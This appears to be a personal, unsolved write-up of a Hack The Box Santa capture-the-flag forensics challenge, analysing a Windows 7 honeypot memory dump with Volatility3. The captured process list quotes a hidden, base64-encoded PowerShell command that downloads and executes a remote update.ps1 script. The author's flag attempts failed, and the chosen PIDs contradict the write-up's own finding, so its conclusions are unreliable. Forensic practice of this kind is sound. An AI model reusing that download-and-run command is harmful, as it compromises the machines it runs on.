# Honeypot Santa really encourages people to be at his good list but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise? 1. Find the full URL used to download the malware. 2. Find the malicious's process ID. 3. Find the attackers IP Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum} Download Link: http://46.101.25.140/forensics_honeypot.zip ## Flag Not pwned. :( ## Volatility3 ### Installation ```bash git clone git@github.com:volatilityfoundation/volatility3.git cd volatility3 pipenv install pipenv shell ``` ### Useful Commands ```bash # get running processes and pid python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.cmdline.CmdLine # get all connected ips python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.netstat.NetStat ``` ## Notes - The honeypot.zip file contains a windows memory dump - By using the `volatility3` framework one can extract data from the dump - By checking `vol -f honeypot.raw windows.cmdline.CMDLine` the malicious process is quite obvious ```bash cat win_cmdline ... snip ... 3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe" 3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe 3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" 3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3324 CREDAT:14337 2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA== 3732 conhost.exe \??\C:\Windows\system32\conhost.exe "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479 4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?) 4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process exited?) 2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe" 2920 conhost.exe \??\C:\Windows\system32\conhost.exe "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802 168 dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} ``` - The base64 string in the powershell command contains a url which contains a rickroll, this has to be the url - The PID of said command is 2700 - By examining the currently active connections, using `windows.netscan.Netscan` the following foreign IPs stand out: ``` Volatility 3 Framework 1.0.1 Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created 0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - - 0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - - 0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - - 0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - - 0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - - 0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - - 0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - - 0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - - 0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - - 0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - - 0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - - 0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - - 0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - - ``` - By eliminating all the ips which belong to M$ we end up with a small set of 5 ips. - To generate the flag the follwing shell script was used, sadly with no success. - I'm unsure about the `... | md5sum` part as this adds a hyphen... ```cat generate_flags.sh #!/bin/bash list=( 147.182.172.189 # digital ocean #172.67.177.22 # cloudflare net #212.205.126.106 # greece #93.184.220.29 # edgecast #95.100.210.141 # akamai ) pids=( 1556 # explorer 2460 # SearchFilterHo 2856 # explorer 3324 # iexplorer 3344 # iexplorer ) for ip in ${list[@]}; do for pid in ${pids[@]}; do echo Generating Flag for $ip and $pid: echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}" echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}" done done ``` - I don't know, maybe the challenge is borked somehow?